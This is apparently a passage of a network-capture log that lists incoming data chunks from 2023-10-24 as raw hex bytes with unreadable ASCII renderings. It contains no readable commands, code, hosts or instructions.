                                                                                                    2023-10-24 04:55:22 UTC2449INData Raw: aa d1 15 42 96 6e f9 c5 2a 0e 5a f7 df 8c 17 f1 05 d8 1d 64 6d 6d 37 54 f4 ca c5 db 1c ec 85 31 7a ef 0d 87 36 d2 5d 27 75 17 45 dd 08 12 36 dd 29 8b e5 4d ab a3 09 6d 75 68 c4 8f 3f ae b2 17 15 4c cf 64 78 19 8b 01 4d 74 e8 40 e9 00 fd cb 20 a8 e9 5d 1d 31 71 ad 97 67 2f 91 bb fa 23 cd 97 e2 0f 6c 68 02 2d b5 d0 1c 38 03 0a f5 4c a8 16 53 fe 80 9e 7e 3c 1c d7 9b 08 f2 db fa 27 84 13 7f a8 fd 8d a8 b5 7f ea d4 84 a1 75 1a 68 93 d9 b4 fe ee f2 52 14 2f e4 a1 b8 1b 18 6c ad 97 e2 09 a2 b3 d0 71 43 59 fa 9f 31 98 19 77 79 b0 74 32 0e ef 22 91 4d ac 1f 51 42 75 e0 50 4c fd e9 4e 82 66 33 de 25 5e ab 27 50 c2 10 1a 06 ee ac d5 8d ac a1 a0 8b bb 40 fb 36 17 ff 36 ce 34 22 60 8d 49 3d 75 6c 84 90 53 63 91 c5 34 ae ed 4a 78 56 95 b8 f8 48 8d 9f b5 e1 bd e6 c0 21
                                                                                                    Data Ascii: Bn*Zdmm7T1z6]'uE6)Mmuh?LdxMt@ ]1qg/#lh-8LS~<'uhR/lqCY1wyt2"MQBuPLNf3%^'P@664"`I=ulSc4JxVH!
                                                                                                    2023-10-24 04:55:22 UTC2457INData Raw: ae a2 8a 5f 16 2c e8 86 c3 c6 05 d9 08 9f f6 0a 91 ef 7e 12 c1 c1 32 a9 7e e1 38 b3 c2 d6 ad 08 65 04 99 59 6d 06 91 ff 57 0a b4 ae ee 1c 3b d6 f1 94 ad a2 a1 b1 d5 d7 23 d3 33 d2 89 39 70 f6 79 b0 c9 f1 88 78 3a 88 c3 9d 78 64 0f ea 6f f9 b9 65 8e 3f fe 1f 46 1d ce 14 e2 81 f3 73 c8 28 75 18 b3 35 fa fa 46 62 ce 4e 1e 78 9c f1 3c f6 e0 36 ef 7d 0b da ab 1f 38 5f fc d1 da 32 da d8 d7 db 36 7c 94 f8 b1 2b 32 07 d6 1f 01 b8 a9 5e ff 49 63 01 6b fa 3e 87 f2 9c 7c a5 47 07 c6 79 65 9f eb 9a da ac 28 8a 61 66 90 de 8e 44 7b e1 10 8a a2 49 4b 41 68 9f 7f e6 08 1e a8 fb 85 75 9e 6e 7a 9f b9 b2 2f e1 58 da b9 16 22 b4 4b 07 b5 8d 0d 4d a4 b7 77 e2 6c 3d a6 7c ce d0 46 df 8c f4 75 81 c3 01 d9 80 69 5e de 78 26 7b 68 1d 7a 37 de 9b 3f 6b 2e e2 80 35 7b 55 81 ac d9
                                                                                                    Data Ascii: _,~2~8eYmW;#39pyx:xdoe?Fs(u5FbNx<6}8_26|+2^Ick>|Gye(afD{IKAhunz/X"KMwl=|Fui^x&{hz7?k.5{U
                                                                                                    2023-10-24 04:55:22 UTC2465INData Raw: 80 bb 1c 1e 96 a1 b6 66 e7 da b4 3f 73 0e 7b cc 3d bf 9c d2 b8 e4 b3 7a 2b c3 da b7 a6 44 a7 3f 9f 4f 2b 38 21 b0 4f 93 f3 bf e6 d1 76 5c 1e 9e 58 5b 6a 28 6b 62 58 26 bc be b8 03 5e f2 a2 2d c7 5e cc ee 8c ae a4 9e 51 01 4b e4 3a b8 8f 6f 85 2c 76 8a 3a 27 d2 76 57 00 11 d0 93 91 5e 60 33 9d 11 73 b8 68 bd 34 3f b6 4e 9e e2 9e 91 50 fa 6f d2 90 67 3a ef bc 7e 56 3c 77 ef 4b 38 41 6d 14 34 31 1b 30 db 14 e9 d0 3d c8 c9 a0 7f db e6 7c 4c 61 7c 09 dc 13 9f 23 94 fb 6b 53 f6 87 c0 20 c5 73 a3 99 fc ae 6d 0d bb f3 a1 7b c6 60 e9 f1 b1 07 91 1d 9c 45 ae c9 70 f3 4e b4 f7 bd 39 b6 3e aa b3 23 f7 ad 6c 26 9e ad 72 4c ce ea ee 40 6d 8a b5 e3 ae cf c5 11 1a 1d 34 1e 26 7d 3e 1c 01 b5 c8 e7 36 ad 8f 5b 1f 64 38 b1 d5 bb fe ee cb 4a 54 19 bb f3 67 68 54 69 68 54 60
                                                                                                    Data Ascii: f?s{=z+D?O+8!Ov\X[j(kbX&^-^QK:o,v:'vW^`3sh4?NPog:~V<wK8Am410=|La|#kS sm{`EpN9>#l&rL@m4&}>6[d8JTghTihT`
                                                                                                    2023-10-24 04:55:22 UTC2473INData Raw: a2 5e 06 35 1d e7 86 17 46 03 da 0f 9b 4f 32 e8 96 3a de 95 6d c1 5a 4c f9 a1 8a 95 f2 a8 23 26 e2 0b 25 ce 1b b8 fa 8a 9f 86 e7 7e 34 57 fd 3d 60 f4 4e 25 96 e5 3f 34 c5 1b e6 64 d2 74 74 e3 5d 72 b8 43 4b 6b 9a 64 c9 3e 1a 78 35 48 c3 93 eb 83 06 7b 02 85 fd 72 84 a9 91 9d e4 f6 be 4d 15 e2 a5 41 69 a0 ed 34 6b 9e df dc 1b b0 be 75 dd fb d9 5d eb fe b1 a6 59 bd 31 26 4d d2 a9 f6 18 f9 f5 f7 8e 6b b8 3e db bc 82 e9 95 e4 57 e1 ec ee 92 ac 22 87 d5 2e f8 42 b9 1f 79 d3 d6 48 7b bf 64 91 65 44 7a e2 7d f0 ab 81 df c1 be 5c 39 ab e3 30 16 33 e5 44 44 5f 52 6e 6f 96 24 3e b3 2d 2f eb 8d b5 1b 43 5d 55 db 64 16 b9 d7 a9 17 50 f5 77 4e 96 35 3c 1d 9b f6 fd e0 92 81 49 82 6f c4 35 ed eb 67 28 df c5 4a e9 df 12 3e b2 da b2 64 78 2a 8a e8 96 e5 2d 7c c4 22 70 93
                                                                                                    Data Ascii: ^5FO2:mZL#&%~4W=`N%?4dtt]rCKkd>x5H{rMAi4ku]Y1&Mk>W".ByH{deDz}\903DD_Rno$>-/C]UdPwN5<Io5g(J>dx*-|"p
                                                                                                    2023-10-24 04:55:22 UTC2481INData Raw: e8 cc 58 28 58 4b de 18 07 39 99 18 cc 70 94 ee 0e 77 dd 5e f9 29 00 66 bc 2a 0d eb 31 19 a6 68 0e e6 58 14 9c 6b 1e 6c fd 32 b7 1e 24 f5 b3 e6 8a d4 18 b0 19 f6 54 5a 6e 78 9c dc fc 04 95 30 16 7b d3 a8 bd a2 b6 99 6a 01 ff 6e 61 c2 53 44 bf 5a 75 7a 32 c5 43 65 55 ec 30 fc 25 fd 2f 54 c4 15 ff f3 ee b7 b9 c8 4b 31 93 f2 57 78 ae 79 32 f1 4f f0 3f 75 03 d8 34 0b d3 c9 7f 07 5d 16 34 37 99 88 a8 9d 6c ef 62 f4 6b e5 e2 25 55 14 cf a8 28 05 ab ca 5a b6 13 b4 4b e2 c4 70 1c 2b d4 dc cd a3 d2 08 be ca e7 95 f1 c8 4d b4 37 90 45 74 4b 94 25 87 3c 6d dd 89 7e 9e 8c 0f f6 9a c2 55 24 1e cf e4 0c 09 1c aa 58 64 57 01 79 ff b4 71 3a 8a 2a 9e 7e 80 08 7a 65 7c d3 4e d0 47 19 0e 55 04 fc 1a 63 95 47 c2 2a 34 1a a5 dc 64 5e 3e 07 b4 e4 91 be e8 4e 26 58 5f 7b 96 ad
                                                                                                    Data Ascii: X(XK9pw^)f*1hXkl2$TZnx0{jnaSDZuz2CeU0%/TK1Wxy2O?u4]47lbk%U(ZKp+M7EtK%<m~U$XdWyq:*~ze|NGUcG*4d^>N&X_{
                                                                                                    2023-10-24 04:55:22 UTC2488INData Raw: 32 94 b9 45 61 8f 93 6a 4b 96 2c 60 ec d5 c3 f3 4f 78 3c 77 38 94 3e e4 5e 9e c6 dd f7 1d 16 db d5 5c 64 94 6e 70 c8 38 f6 b2 42 b0 69 0e 5e d7 df 4c cb 2f 12 8b 5f bc 66 91 7b 21 5b 15 8c c0 47 73 7e 0f 69 e6 38 78 fe 95 5b 41 8a be 2e 5e 7d fe 39 90 a7 67 1f 51 74 a7 bf 61 38 e4 9f d5 71 7a 48 0b d2 7b 82 46 db c9 af e6 8a 3f a1 bb bf f2 35 61 a5 51 65 0a 9b a2 cc 59 c7 69 a7 99 64 21 4e 39 97 d7 46 35 c2 77 f2 6d 0d 17 f3 56 de 39 41 63 80 0f e6 28 7a 64 96 6e e9 62 d5 5f 48 58 fe e3 71 44 a5 09 93 c2 ac ad 12 cf 8d 27 39 8e 51 68 38 aa 43 f9 25 d8 21 33 b1 6f 5d 80 ab c8 c7 5c 2e 71 54 72 78 f5 46 d5 aa 4d ca 62 ab 9d aa 0d d5 1d 31 ee 6d a7 09 bc 57 2a 76 d2 90 0b ca 39 da 4f eb ad 37 3d df 46 2e 30 59 00 62 36 5c 20 93 7b 7f 2a 00 cd 54 52 77 91 72
                                                                                                    Data Ascii: 2EajK,`Ox<w8>^\dnp8Bi^L/_f{![Gs~i8x[A.^}9gQta8qzH{F?5aQeYid!N9F5wmV9Ac(zdnb_HXqD'9Qh8C%!3o]\.qTrxFMb1mW*v9O7=F.0Yb6\ {*TRwr
                                                                                                    2023-10-24 04:55:22 UTC2496INData Raw: 7a fb 34 c3 50 14 70 7c 0d 7d 7e dc 73 1e 23 ef 35 af 92 31 cb 3d 1e 7a fe 19 97 b7 49 b6 bd 93 d9 08 fa 68 f9 f2 05 3a 63 a6 23 86 73 b7 38 9a 46 e7 30 6d aa 68 57 d9 fe 2d 9f 04 bf 3b 67 58 16 7f f8 88 75 e0 9b 99 db 3c f0 12 0a a7 97 cc a5 ff 31 14 e6 50 ae 2c 4a df 63 dc 47 6e 89 0f 3d fa 3a 0f 3b 4d 52 0e 99 82 f9 94 f2 3e 0e d7 5c fc b2 49 af 84 e5 bf 3c d9 03 83 b1 18 11 b1 c8 24 13 9a 5f 06 ff 83 33 37 55 0f a6 47 80 cd ac c1 ec b0 22 1a e3 1b a3 61 34 93 7d 00 ae 70 fc 7a 00 71 57 85 0e 69 84 7e ea 18 f2 b8 77 78 73 cd 96 7c f8 74 4b 71 85 43 26 51 6f c8 ae 73 11 a7 e8 86 b1 7c 41 62 f8 0a 7d e7 d1 79 ab 02 d1 c9 5b 98 a8 5d 8e d3 ed a7 ee 1a 5a 3e 33 1f 7b e7 b6 f2 47 cc 34 dc 2c 5d d7 4e f0 43 7c 60 3e f6 ba ed e4 df f4 cd b7 83 ec ff 09 f6 0b
                                                                                                    Data Ascii: z4Pp|}~s#51=zIh:c#s8F0mhW-;gXu<1P,JcGn=:;MR>\I<$_37UG"a4}pzqWi~wxs|tKqC&Qos|Ab}y[]Z>3{G4,]NC|`>
                                                                                                    2023-10-24 04:55:22 UTC2504INData Raw: fd 8a ce 37 2b dd 6c 59 be 12 0d 1f 5a 5e 3b 66 cd bd 47 93 75 f4 91 e8 bc 29 88 85 7c e9 50 a6 79 c9 75 df 4b 5f fe 12 aa 11 04 5f eb 7e 10 a4 82 5d 26 5b b7 d5 20 37 14 f8 5a 1f 0d 4c 4b 57 3c 94 5f 0e 0e b8 15 5e ba 4e 9a 0c 7a da 5b f8 38 f8 7a 40 de ab ee 2a 7e 17 d6 2a e6 60 72 eb dc 60 42 60 62 cb 3a 1e 04 52 b5 74 d3 75 eb 2c ad 21 f6 a6 f1 7f 7f ba 5f 9f eb 6f cc 08 f9 c4 79 16 ec 80 ce 7e 37 67 a3 a0 19 78 88 7d f8 6d 02 f9 e5 82 9e 89 79 07 79 02 fe 64 54 cc 43 b5 d3 35 81 ba e4 df 4b 4a ed 7b 7e ed 19 9f 2a 42 b1 c3 4d 3c c3 08 9e 73 78 b7 ad f2 b1 13 1f 63 73 18 13 ff 6b 5e 02 f4 49 c8 67 27 51 dc e5 25 08 72 c4 21 4f 1d ad fc 78 7f 54 4f 36 5f 9f cf c7 9c 16 a3 f8 b7 9a bf 78 f5 22 a2 c9 eb 20 46 7b 0c 33 1e 37 80 f2 14 01 be ca 63 31 00 0b
                                                                                                    Data Ascii: 7+lYZ^;fGu)|PyuK__~]&[ 7ZLKW<_^Nz[8z@*~*`r`B`b:Rtu,!_oy~7gx}myydTC5KJ{~*BM<sxcsk^Ig'Q%r!OxTO6_x" F{37c1
                                                                                                    2023-10-24 04:55:22 UTC2512INData Raw: 46 48 24 9f 2c dc f0 9d f9 29 23 6a 88 20 0f 2a a6 f5 ff c4 f9 71 4f 77 bd 89 ec 80 b2 c6 a5 c7 74 c7 93 b9 55 42 eb a8 53 fa 06 d8 dd f0 c6 ec 08 2a ba ab 4a 58 ea f4 2e f4 6f c3 0f f1 7b 84 ed 0b 41 7f b4 7f 27 b0 48 77 7e df ec b3 b5 c8 af 7e 9f 52 d7 1f 92 94 cf 6f 75 b2 78 32 03 60 ae e2 76 0b ce ae 5b b2 17 77 d4 09 f9 f5 1c 6b aa d8 34 58 ed 3f 7d f8 02 97 af 3f 22 e5 b4 7b e1 f5 42 5d 55 80 b0 2d d9 db 5f 99 b0 4f dc fe 64 fd 0d d3 ef 74 fd 00 1f 34 f1 2a c4 11 1a de 78 9a 6b 08 b5 df 78 3d 5b 69 6b 0e 7e 59 03 7b fa 45 92 cd 31 a9 a3 cc 1a 0f 54 3f ea 57 e4 57 bf cf b7 32 af 60 ba 04 a4 28 aa ab 60 9c 53 3f 65 6d f2 30 b1 6b 1e 74 a8 38 42 7e 0e a7 f5 aa f1 eb 1e e4 75 1a e7 48 a6 7c d4 cb 82 a1 65 1c b5 2c 37 de 69 11 72 6a 3c 78 f7 6d a9 9e 95
                                                                                                    Data Ascii: FH$,)#j *qOwtUBS*JX.o{A'Hw~~Roux2`v[wk4X?}?"{B]U-_Odt4*xkx=[ik~Y{E1T?WW2`(`S?em0kt8B~uH|e,7irj<xm
                                                                                                    2023-10-24 04:55:22 UTC2520INData Raw: 99 4c bc 15 d8 4d c4 76 6a fc 35 c4 9c ca 12 cd 79 e4 b6 a6 cb 7b 79 81 b4 aa f6 37 80 b5 e8 c6 1e 5d 51 43 63 18 f3 c5 15 17 22 e4 74 c6 21 11 6b 21 25 17 22 a7 87 b4 b8 fc d4 1a 86 e6 8e 8b 05 64 d9 7c 3a 9b 96 99 2b de 78 92 67 5c 23 d8 ea 3b 1d c6 8d b7 b0 22 60 6f 74 68 b9 db b7 1c 12 e3 37 be fe fa 8b b8 d6 77 1c 22 62 d9 7a 43 80 73 dc 34 27 02 dd 5f 6b 87 bc 76 3f 5f af 96 aa a0 c6 78 c1 01 c1 bb 9d 79 5e 02 aa 6b 52 8d 7f f8 61 d1 8e 9e 65 2e 2c ba 47 6c 7d 40 f4 31 ce 5b f6 1c 77 1e cb 2b 52 e3 ab d8 cf 47 24 0c e2 ba 08 aa fd 14 87 04 a8 21 21 cd a0 be 34 13 58 6e 5a e0 3e de 56 03 6b bb 31 7f 58 57 47 07 66 5e d2 cc 21 f9 39 8c 3e fa c2 df 53 01 f9 b5 1c 8c 56 e4 19 8c d1 90 05 9e 41 4c 1e 22 31 54 cd 02 b4 58 33 74 73 a9 f3 d9 78 e7 33 44 ae
                                                                                                    Data Ascii: LMvj5y{y7]QCc"t!k!%"d|:+xg\#;"`oth7w"bzCs4'_kv?_xy^kRae.,Gl}@1[w+RG$!!4XnZ>Vk1XWGf^!9>SVAL"1TX3tsx3D
                                                                                                    2023-10-24 04:55:22 UTC2527INData Raw: 1a f2 b4 75 86 01 16 8f 68 77 5b 93 ab 10 18 f2 bf 9d 98 73 bb cd 46 7c 1f 57 83 de 43 df 87 ba ec b2 d8 9d 98 57 08 21 46 7d 8f d6 7e a7 b9 95 9f 36 60 ea 77 38 d8 c9 0f 20 06 e0 f9 41 4d 31 b2 c8 0c c8 61 93 5c 21 22 4e 06 56 6f 89 5b 61 f9 ef 7b 5c 3b 64 ea 12 2d ae d8 51 30 4f e9 75 e6 29 8f 49 9e 02 fd 9d 0b 98 23 0d ea 53 f6 8f e4 29 f1 ca 01 53 05 e4 29 a0 2b d0 f3 54 d0 f3 5f 89 9e d1 76 7b 9d 71 cb 9b 97 e4 ca fa c1 e9 79 1b a2 df 7f 49 cf fb 7f d7 f3 1e b4 ba 20 60 37 68 07 a0 f1 1f 50 e3 14 27 0a e0 3b 22 35 94 14 2f a5 3b a0 9e 8b ee 74 42 d1 db 3d 42 fe 75 92 e1 96 01 b2 7a 23 b2 f6 39 91 f5 3e 41 56 60 5f 62 cc a3 c4 03 b1 5b 12 94 bf f1 c4 7b d0 f3 48 31 44 71 53 21 f0 c4 11 0d b9 20 1e 0c 8c e2 c1 41 2b 45 9a 35 cc f8 9e 20 d2 4b 0c 60 ef
                                                                                                    Data Ascii: uhw[sF|WCW!F}~6`w8 AM1a\!"NVo[a{\;d-Q0Ou)I#S)S)+T_v{qyI `7hP';"5/;tB=Buz#9>AV`_b[{H1DqS! A+E5 K`
                                                                                                    2023-10-24 04:55:22 UTC2535INData Raw: 0b 7a 5a 4c 7c 92 fb ad b4 ca 10 31 b1 ac e8 de d2 bf 97 77 79 bb da 85 29 58 51 6a 24 52 8d 5d a6 6f fd 70 e5 c7 9e de af 9c ef aa fd 6a 41 3d b3 b8 13 4b df 11 d4 2f bb fd 3b ec 94 d0 9f d9 7f 46 6a a9 f3 19 3d 5a d9 64 61 bb e7 85 c8 e6 71 fe 27 5b f6 92 eb 3d 75 1c b1 e4 32 bf b4 0b 8d 19 2a 2f cf 7f 51 47 a8 be 4c b9 c6 77 01 df cd 5f 96 73 94 0d db 6a 44 ee 48 0d 45 ab ec 74 94 b0 ff 78 52 a9 28 ac af ee a2 ac b0 10 0c eb 17 bf 93 ad 68 5d e5 dd cb 9d 45 7c 4b ef 71 5e 13 d9 46 d4 94 dd 95 9e 5d ea 48 b4 6f a9 e3 21 97 2b c5 0f ae 69 69 4b 0d 52 c3 b2 36 13 1a b5 b8 ba 60 05 9d ad 6c 2d 8d 05 56 d6 09 79 9c 96 42 c1 2e ac f0 bc b3 6a aa 2d 48 75 15 ad ad bc dc 7b 71 87 e7 e5 5e 66 bd ea 96 bc b1 72 ab ef 43 71 2e 68 e9 7a f5 ea 5f da 5e f5 f5 af 89
                                                                                                    Data Ascii: zZL|1wy)XQj$R]opjA=K/;Fj=Zdaq'[=u2*/QGLw_sjDHEtxR(h]E|Kq^F]Ho!+iiKR6`l-VyB.j-Hu{q^frCq.hz_^
                                                                                                    2023-10-24 04:55:22 UTC2543INData Raw: eb f6 e7 31 5a ba f4 94 eb 36 a2 c9 c5 07 5a 68 8f e9 5f 01 cc 8a 2b 39 ca 84 16 e3 4b bb 69 a5 ee b4 7c 13 86 8b ea 32 84 98 26 31 85 88 1f b5 cf f0 45 10 fd aa a9 76 52 cb 5f 56 32 8a f4 aa 9e ef 22 c8 b2 4b 59 62 5c 33 97 62 7a 57 75 47 e2 e3 50 8a 0b 6e c4 e5 fa 0d 1a 5b 70 72 f4 f5 ff a7 d2 fb 12 82 84 4a 15 69 55 84 d9 c7 65 92 0c 33 60 b9 65 0b 96 a9 48 e1 6f 98 ad 5a 22 e1 89 2b 10 73 61 11 41 8f 01 46 fb c6 41 bb e0 55 88 f9 19 fa f6 a9 50 11 43 e8 2b 00 ac 6d 25 62 46 02 2c b7 42 dd ae 63 be 84 3f 14 23 a6 76 25 41 c7 0a 55 64 f5 72 cc 2e 06 58 16 c0 46 02 2c 0d 60 be 00 b3 04 98 12 60 ed 57 10 f4 b1 40 45 6e 2d c3 ec c5 3c 09 5b 96 20 c6 36 8f 20 9f 22 68 b7 02 b3 09 05 12 9e 06 30 37 e8 bb 0f da 55 42 bb 7c 68 97 5b 84 98 34 e8 1b 05 30 17 80
                                                                                                    Data Ascii: 1Z6Zh_+9Ki|2&1EvR_V2"KYb\3bzWuGPn[prJiUe3`eHoZ"+saAFAUPC+m%bF,Bc?#v%AUdr.XF,``W@En-<[ 6 "h07UB|h[40
                                                                                                    2023-10-24 04:55:22 UTC2551INData Raw: 94 55 b0 0b 75 02 2e 38 2a 4b 39 81 ef 25 58 8b 66 4a 4b 6e 12 3f 16 6c fc 04 e5 18 ee 57 68 d7 03 78 1e c5 0d e1 23 85 78 71 b8 32 92 8b e0 03 84 40 71 bb e4 0b 7e e1 7f 86 c1 06 f2 5a fa 16 16 c8 87 c0 6e 3f 45 19 fd c3 1e 47 c5 a3 50 ca fc 5f a2 77 05 a9 51 b6 63 3b a0 4e 78 11 f9 0c 3b 2f b2 52 4b f6 2e fa 51 5f 27 e5 07 76 23 bf 15 4a 65 ca f7 ec 3a d4 05 ec 4b 3b 69 09 6b c3 2b 05 6d 71 93 d2 9a 5b c3 5f c4 57 45 4b e8 61 cc 9f c7 e6 a2 ae d2 10 4a e3 1b 47 e9 88 5a 43 ed 19 65 37 96 41 07 84 43 22 96 fa 70 2f 51 4f e1 1f d2 44 7a 07 96 81 c5 b6 e2 cf ca e7 ec 4b 28 ad 25 6b 94 45 1c 23 97 b0 54 0e 3d 56 e3 59 e2 5b e9 29 fb 1c dd c6 59 62 8e 72 0a f7 1c 5d 04 bb 7c 4f 86 e9 0a 2a d1 50 89 39 6d 5e 12 10 f4 f8 93 b3 e0 f5 04 2b d0 7c 6b c0 be 01 3c
                                                                                                    Data Ascii: Uu.8*K9%XfJKn?lWhx#xq2@q~Zn?EGP_wQc;Nx;/RK.Q_'v#Je:K;ik+mq[_WEKaJGZCe7AC"p/QODzK(%kE#T=VY[)Ybr]|O*P9m^+|k<
                                                                                                    2023-10-24 04:55:22 UTC2559INData Raw: a9 96 dc c8 de d1 1b 8c 93 e8 5a 7c 8d b7 09 92 77 fb 51 b6 bd 5b 99 76 c6 5b ac c8 c1 fd 5b 81 ed 0a c6 94 1d d6 5a 53 2c 0b 6d fb 94 33 65 f2 e2 58 60 6c f3 16 ca fd 42 f5 b6 a7 94 f3 a5 51 4f af ab 55 ec 3b ef c8 ce fa 53 6a de d0 55 61 ae ec da d3 79 45 28 05 61 df 79 5f f4 b6 d7 ee bb 9b 65 4d 29 cd ea 8e b5 b2 29 97 8a 98 57 2c d5 67 dd 92 53 5f 10 0c 55 c1 a8 79 2e 58 ad 55 03 5e 2f ce bb b6 a8 54 6b 4d 04 b6 a2 54 b7 d4 e2 9c 63 09 72 a5 ca 5d 7e 74 90 ce 7a b2 50 d3 16 ca 86 ae 48 a6 f7 d8 63 f3 7a de f2 54 a7 8a 6b 9b 36 85 8a a9 3c f6 d8 88 64 bb 38 c7 a2 5f 70 35 e1 f2 e5 05 e5 5e 1d c7 5b f0 1c 49 ad 59 17 2e e4 54 2f 80 1e 51 ed e8 ab 57 97 f9 00 35 d9 05 c9 c1 78 57 dd b3 d3 31 a9 d4 96 74 de d3 c5 6c a9 a2 2e 6f 68 a5 35 c8 7b 9c ba 1b f5
                                                                                                    Data Ascii: Z|wQ[v[[ZS,m3eX`lBQOU;SjUayE(ay_eM))W,gS_Uy.XU^/TkMTcr]~tzPHczTk6<d8_p5^[IY.T/QW5xW1tl.oh5{
                                                                                                    2023-10-24 04:55:22 UTC2567INData Raw: c9 d7 b4 20 25 56 79 12 47 94 2c 98 ad 58 ec b6 2c 90 d8 5b c3 f3 4b a7 7b d6 96 f0 a4 d3 a9 ae 82 29 26 c7 27 17 87 17 b3 dd 5e 00 71 84 cb 43 72 d6 f0 65 91 af c5 6f 9a b2 d8 1b 55 3c c6 2f d0 92 2d e1 8e 97 ea 93 c8 b2 11 af 01 56 d1 f7 32 df ec 8c 76 e8 71 6f 5d c0 38 a7 9a f1 24 57 56 f1 3b 2c 91 d8 f0 be 2e ee 0f cd 2d ac 85 16 78 74 34 fa 4e bc 73 c2 59 c5 f3 84 52 0a 56 19 d6 2a c6 b3 ab c3 d9 e9 1c 3c ed 39 a1 b1 b3 c3 4c bc bd 1b ee 33 80 26 43 f8 5e 21 e7 7c 6d 01 22 56 c7 78 9a e7 bb 3c ab 2c 3b b8 bb bf d4 4b f6 4a 35 d5 40 da 5f b9 fc e8 d5 53 67 cf 9f b9 f4 78 f2 ca 13 83 67 2e 5c bb 72 a1 57 96 9f b8 fe 28 7f b9 f0 b8 24 89 8f c9 9b 9b 97 c5 2b 8f 2b 8f 5e bb 56 28 5d ba 5a 94 ae dc 50 af 15 8b 57 8b c2 b5 07 cf 21 e7 55 c3 15 7b a5 9a 8a
                                                                                                    Data Ascii: %VyG,X,[K{)&'^qCreoU</-V2vqo]8$WV;,.-xt4NsYRV*<9L3&C^!|m"Vx<,;KJ5@_Sgxg.\rW($++^V(]ZPW!U{
                                                                                                    2023-10-24 04:55:22 UTC2574INData Raw: c8 94 7c c0 17 04 f8 ae 63 bf fb 47 26 ef 04 7c 1d 62 ff 39 1f bb f1 7b 4e f4 f7 78 65 88 bf b9 e0 06 fa 0e e1 6b 95 ce 8c 43 9d c6 8c c3 41 12 4a c4 ff ee 6e 8d 38 96 81 7f 47 6e 97 28 9a 16 87 57 87 80 2f 16 f0 15 00 3e fc 3b 6d 8d 80 0f ff a6 ce 2b f1 ff b4 8b c7 3b 4c fb 73 1e 08 89 fe 3e bf 14 8a 34 38 c5 95 a4 66 fc be 31 75 ba 48 e3 55 06 e3 67 66 4f c7 2b 09 70 b6 92 f8 99 f7 d3 76 25 c1 c9 ee 80 fd 5c 0b d3 76 e9 60 cf 09 10 fb 75 7d 4c db 0d fb 83 5d 79 60 37 ea 2f 76 53 ff 60 57 16 d8 cd f9 83 5d 71 60 f7 f2 5f ec 36 fe c5 6e db 5f ec f6 fc c5 ee f0 5f ec 72 ff c1 ae 38 9d a8 cd fe 88 b3 8c e8 7f da 15 c5 7b 8e 4b fe 19 e7 85 f4 3f db 75 11 ff b3 dd b5 7f b0 8b c7 bb f5 2f 76 a3 ff 62 37 e1 0f 76 f1 f9 cd ff 8b dd ca bf c4 5b ff 17 bb 1d 7f b1
                                                                                                    Data Ascii: |cG&|b9{NxekCAJn8Gn(W/>;m+;Ls>48f1uHUgfO+pv%\v`u}L]y`7/vS`W]q`_6n__r8{K?u/vb7v[
                                                                                                    2023-10-24 04:55:22 UTC2582INData Raw: cb 4f 0c e6 3e 65 41 4c 5b 58 a7 31 00 36 3a 88 f9 45 01 06 10 31 e7 b7 a6 73 8d fa 9f 18 e0 b8 fc c4 60 81 95 16 14 d2 b8 06 f1 6d 70 c4 fc 5a 76 c3 bb 9e 9d 44 af f7 d7 43 bb a3 b6 22 ee ab 2c b1 3d 9e ca b0 9b 87 1b 9a 50 72 01 0a ed 11 46 24 06 68 3f 30 50 8f 3d 39 65 63 12 d8 ed 06 fa 70 0c 70 5f 6e fe 61 bd 35 fd f0 0f 01 fe e1 18 e0 d8 1b 5a 1a 01 ec 03 e0 35 f5 eb d1 c8 57 a9 d0 a9 fe 27 04 f6 db b6 6b c1 ad 09 7a 68 4f 85 2d f4 30 5e 07 f1 f0 f2 c0 c2 5a db 60 23 56 0a 91 93 5a 2f b9 90 f9 49 c5 84 0d 31 2a 0f b0 3b 02 f4 8d 21 b8 2f 18 81 f3 ef 39 7e f7 87 7f 30 b1 16 7a 88 39 72 5d 69 8e 1e ea 08 82 02 1e ed 45 8e f6 3e c5 ca df 37 c0 a1 b1 01 e8 83 14 03 48 e0 92 27 42 02 f3 31 72 d1 17 2e 4b 58 86 6e ad a8 80 5c 85 28 88 de 1b 3e cc ad fe 39
                                                                                                    Data Ascii: O>eAL[X16:E1s`mpZvDC",=PrF$h?0P=9ecpp_na5Z5W'kzhO-0^Z`#VZ/I1*;!/9~0z9r]iE>7H'B1r.KXn\(>9
                                                                                                    2023-10-24 04:55:22 UTC2590INData Raw: 3f 7e ea 2e 03 12 1a bf c9 ce 7d ff a1 e7 32 b0 83 cd 62 63 87 81 6d 14 22 f3 43 ce 2e 2c 88 bb 07 3b c6 2f 20 48 d0 78 78 67 41 ec 1c 9c 48 ef c7 4f 95 f8 be 36 25 4b 3d 96 90 18 c0 c3 cb 47 63 63 e7 80 81 7d 94 97 8f 0d 12 12 16 41 9c 5d d8 31 fb a5 13 b0 08 09 22 68 c0 3e 02 ee f1 30 a0 83 9c 98 94 bc 66 6a af 9b 07 e4 de 13 7f d5 c3 c3 8b f2 0b 70 40 40 07 02 f4 63 b6 76 e3 b0 fd 52 16 c0 23 48 d0 78 f9 f8 b1 69 3e ce d9 13 af 81 ac 0a f0 c0 08 5c 13 04 f6 51 01 41 4e 08 c4 80 f0 f1 0b 60 20 7e d8 d6 8e 0d b5 5f fa 1d 02 f1 13 34 10 03 3c cd 07 74 e0 0f a0 8d 80 1d 23 10 1f 3a 47 88 0b 02 d7 10 01 c1 39 18 e0 85 d9 d8 49 a8 b1 c9 38 a4 ab 37 89 b0 73 90 09 1a f8 f7 83 4f 70 8e 10 0d c8 1a 02 0c 8c 45 48 bc 10 d0 81 80 98 31 20 0f 73 71 93 51 77 8f af
                                                                                                    Data Ascii: ?~.}2bcm"C.,;/ HxxgAHO6%K=Gcc}A]1"h>0fjp@@cvR#Hxi>\QAN` ~_4<t#:G9I87sOpEH1 sqQw
